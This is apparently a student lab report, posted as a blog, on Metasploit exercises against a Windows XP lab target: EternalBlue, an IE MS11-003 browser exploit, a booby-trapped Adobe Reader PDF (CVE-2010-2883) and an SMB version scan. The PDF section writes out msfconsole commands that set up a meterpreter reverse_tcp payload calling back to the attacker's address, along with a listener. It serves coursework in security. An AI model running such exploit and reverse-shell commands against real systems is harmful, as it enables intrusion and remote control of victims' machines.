20212405 2023-2024-2 《网络与系统攻防技术》实验六实验报告

一、实验内容

一个主动攻击实践,尽量使用最新的类似漏洞;
一个针对浏览器的攻击,尽量使用最新的类似漏洞;
一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
成功应用任何一个辅助模块。

二、实验过程

2.1 使用永恒之蓝漏洞(MS17-010)对靶机进行主动攻击

永恒之蓝:是一个在2017年爆发的重大网络安全事件。该漏洞利用Windows系统的SMB(Server Message Block,服务器消息块)协议漏洞,允许攻击者无需用户任何操作,只要目标系统开机上网,就可以通过该漏洞远程获取Windows系统的最高权限,进而控制被入侵的计算机。
在永恒之蓝漏洞被公开后,不法分子迅速利用这个漏洞制造了WannaCry勒索病毒,并在全球范围内大规模传播,给学校、大型企业、政府等机构带来了严重的损失。该病毒通过加密用户文件,要求用户支付高额的赎金才能恢复文件,给用户带来了极大的困扰。
靶机:winXP,地址:192.168.122.133
在这里插入图片描述
kali的地址是912.168.122.132,然后ping一下看看能不能连通:
在这里插入图片描述
在这里插入图片描述
然后对靶机进行扫描看一下能不能利用永恒之蓝漏洞:
在这里插入图片描述
发现是有ms-17-010的,就是说靶机是可以用永恒之蓝攻击的。
这个漏洞需要445端口,所以再对靶机进行端口开放的扫描:
在这里插入图片描述
445是开放的,接下来进入msfconsole查看永恒之蓝漏洞的相关信息:
在这里插入图片描述
选择自己想用的功能,我直接选用了1,然后配置,RHOST是靶机的ip,配置后run就开始:
在这里插入图片描述
这样的显示就是攻击成功了。

2.2浏览器攻击(MS11-003 Microsoft Internet Explorer)

漏洞介绍:MS11-003是一个与Microsoft Internet Explorer(IE)浏览器相关的安全漏洞,具体涉及到CSS(层叠样式表)的递归导入和释放后重用的问题,这个漏洞允许攻击者绕过同源策略,加载恶意代码或进行其他攻击。具体来说,攻击者可以构建一个包含恶意CSS文件的恶意网页,并通过各种方式将其传递给受害者。当受害者使用受影响的IE浏览器访问这个恶意网页时,浏览器会解析网页中的CSS文件。在解析到恶意CSS文件时,浏览器会执行其中的@import规则,并尝试加载外部的恶意CSS文件。一旦恶意CSS文件被加载,其中的恶意代码就会被执行,从而可能导致各种攻击,如跨站脚本攻击(XSS)或CSS历史记录窃取。
接下来开始实践,还是进入msfconsole查看这个漏洞的相关信息:
在这里插入图片描述
要用的是17,然后showoptions查看相关信息:
在这里插入图片描述
然后配置ip和端口,用到的都是kali的ip:
在这里插入图片描述
配置好之后exploit,会生成一个url,将其放在靶机的IE8浏览器中跳转到此链接(不会有结果界面):
在这里插入图片描述
然后回到kali查看(就是在靶机跳转页面的过程中观察kali的显示):
在这里插入图片描述
可以看到建立了会话,然后能获取到shell:
在这里插入图片描述
至此浏览器攻击成功

2.3一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞(CVE-2010-2883)

漏洞简介:CVE-2010-2883漏洞主要存在于Adobe Reader和Acrobat 9.x(9.4之前版本)的CoolType.dll中。该漏洞是一个基于堆栈的缓冲区溢出漏洞,它允许远程攻击者通过特制的恶意PDF文件执行任意代码或导致拒绝服务(应用程序崩溃)。
具体来说,这个漏洞与Adobe Reader处理CoolType字体文件的SING表(Smart INdependent Glyphlets)的方式有关。在处理这些字体文件时,Adobe Reader会将SING表的UniqueName字符串拷贝进栈中,但在执行此操作时,它不会检查字符串的长度。如果字符串长度超过了栈的预期容量,就会发生缓冲区溢出,导致攻击者能够利用这个漏洞执行任意代码或使应用程序崩溃。
接下来开始实践,靶机是winXP。
首先下载adobe reader9.3在XP上,然后进入msfconsle查看相关信息,然后进行配置:

调用渗透模块
use exploit/windows/fileformat/adobe_cooltype_sing/
调用meterpreter载荷,反向连接到渗透机
set payload windows/meterpreter/reverse_tcp
设置攻击机IP地址(kali)
set LHOST 192.168.122.132
设置带有后门程序的PDF文件
set FILENAME 20212405.pdf
在这里插入图片描述
然后exploit,就会看到生成pdf的路径,这是一个隐藏文件夹,需要手动输入路径才能查到,把这个pdf拷到靶机上。

然后在kali上监听:

使用handler监听模块
use exploit/multi/handler
回弹一个tcp连接
set payload windows/meterpreter/reverse_tcp
设置监听IP地址及端口(跟PDF文件一致)
set LHOST 192.168.122.132
端口:2405

然后打开pdf,这个pdf会打不开卡住 :
在这里插入图片描述
打不开是正常的,回到kali上观察,发现可以连接(见上上图)
然后用ls命令查看:
在这里插入图片描述
发现可以查看靶机桌面,然后使用screenshot对靶机进行截屏:
在这里插入图片描述
在这里插入图片描述
至此客户端攻击成功。

2.4应用辅助模块( SMB Version Detection)

简介:
Metasploit(通常是Metasploit Framework或简称MSF)是一款开源的安全漏洞检测工具,用于帮助安全和IT专业人士识别安全性问题、验证漏洞的缓解措施,并管理专家驱动的安全性评估。Metasploit Framework包含多个模块,其中辅助模块(Auxiliaries)是其中一个重要组成部分。
Metasploit的辅助模块主要用于信息搜集阶段,其功能包括但不限于:
扫描:对网络目标进行扫描,以发现潜在的安全漏洞或弱点。
口令猜解:尝试破解网络服务的密码,如FTP、SSH、SMB等。
敏感信息嗅探:捕获和分析网络流量,以寻找敏感信息,如用户名、密码、信用卡号等。
FUZZ测试发掘漏洞:通过向目标系统发送大量随机或模糊的数据包,以触发潜在的缓冲区溢出或其他类型的安全漏洞。
实施网络协议欺骗:模拟或伪造网络协议的行为,以欺骗目标系统或绕过安全机制。

SMB(Server Message Block)协议是一种客户端/服务器协议,用于在Windows操作系统中共享文件和打印机等网络资源。SMB协议是微软开发的一种网络协议,它在局域网内被广泛使用,允许计算机之间共享文件、打印机和其他资源。

下面开始实践:
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.122.133(靶机地址)
在这里插入图片描述
可以看到扫描出了很多信息,包括我电脑的语言,名称和一些其他属性。

三、遇到的问题

这次的实验还是进行的不太顺利,首先漏洞是需要和虚拟机匹配的,我试了四五种漏洞才能在虚拟机上成功实验。每个人的情况可能都不一样,有的时候别人的虚拟机可以用这个漏洞,我用同样的虚拟机就不行,试错的过程十分耗时也比较崩溃。
最不顺利的就是浏览器攻击的部分,首先我以为自己的IE8上不了网,后来才知道要看是否能跳转到网页而不是直接看初始的有问题界面。也可以通过cmd来ping一些比如baidu之类的网站来查看自己的网络是否正常。
然后就是url的跳转,失败了几次都是因为无法跳转到最后查看会话,不到这一步就不算成功,也无法获取shell。这其中有很多问题,我上网查找了很多解决方法,基本都是从网络配置下手,也让我对联网的一些设置有了些新理解。

四、学习心得

这次遇到的漏洞其实很多,因为实验的要求很宽泛,就需要我们自己去查资料或者交流都可以用什么漏洞去实践,和同学交流也发现大家可能都用一个漏洞但是各自的问题都不一样,看电脑配置,这样的话其实难度更多的在于解决遇到的问题而非实验本身,很考验我们的动手能力。说实话这次实验做的挺痛苦的,一次次查报错,实在解决不了就换另一个漏洞重新开始,但是也让我认识了很多新的漏洞各自可以用的虚拟机和各自的作用,拓宽了知识面,也知道了漏洞在针对客户端或者浏览器的时候都应该怎么用,是一次含金量较高的实验了。

  • 15
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值